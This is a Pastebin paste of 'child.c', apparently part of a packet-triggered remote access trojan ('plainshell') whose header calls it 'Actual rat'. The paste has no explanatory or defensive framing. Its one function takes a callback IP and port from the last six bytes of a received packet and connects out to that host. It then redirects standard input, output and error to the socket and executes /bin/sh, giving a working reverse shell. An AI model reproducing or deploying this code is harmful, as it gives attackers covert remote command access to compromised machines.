Advertisement
FlyFar

child.c

Jan 20th, 2024
581
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.46 KB | Cybersecurity | 0 0
  1. /*
  2.  * child.c
  3.  * Actual rat
  4.  * By J. Stuart McMurray
  5.  * Created 20160319
  6.  * Last Modified 20160319
  7.  */
  8.  
  9. #include "plainshell.h"
  10.  
  11. /* shell calls back the address specified in the last six bytes of pkt, which
  12.  * is of length len. */
  13. void shell(const u_char *pkt, bpf_u_int32 len) {
  14.         struct sockaddr_in sa; /* Address */
  15.         int s;                 /* Socket */
  16.         int i;
  17.  
  18.         /* If we don't have at least 6 bytes of packet, :( */
  19.         if (6 > len) {
  20.                 errx(8, "Packet too small");
  21.         }
  22.  
  23.         /* Wait before calling back */
  24.         sleep(WAITTM);
  25.  
  26.         /* Work out the address */
  27.         sa.sin_family = AF_INET;
  28.         memcpy(&(sa.sin_port), pkt+len-2, sizeof(sa.sin_port));
  29.         memcpy(&(sa.sin_addr.s_addr), pkt+len-6, sizeof(sa.sin_addr.s_addr));
  30.         bzero(sa.sin_zero, sizeof(sa.sin_zero));
  31.  
  32.         /* Make a socket */
  33.         if (-1 == (s = socket(AF_INET, SOCK_STREAM, 0))) {
  34.                 err(7, "socket");
  35.         }
  36.  
  37.         /* Connect to the remote host */
  38.         if (-1 == connect(s, (struct sockaddr *)&sa, sizeof(sa))) {
  39.                 err(9, "connect");
  40.         }
  41.  
  42.         /* Replace file descriptors */
  43.         for (i = 0; i < 3; ++i) {
  44.                 if (-1 == (dup2(s, i))) {
  45.                         err(10, "dup2");
  46.                 }
  47.         }
  48.  
  49.         /* Exec a shell */
  50.         if (-1 == execl("/bin/sh", SHNAME, NULL)) {
  51.                 err(11, "execl");
  52.         }
  53. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement